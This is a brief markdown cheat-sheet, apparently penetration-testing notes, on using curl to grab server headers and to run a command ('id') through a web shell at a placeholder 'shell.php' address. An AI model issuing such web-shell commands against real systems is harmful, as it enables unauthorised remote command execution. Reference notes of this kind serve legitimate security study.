# Curl

We can use cURL to retrieve server header information from the command line.

* `curl -IL https://www.ourtarget.com`
* `curl http://SERVER_IP:PORT/shell.php?cmd=id` execute a command with a webshell.
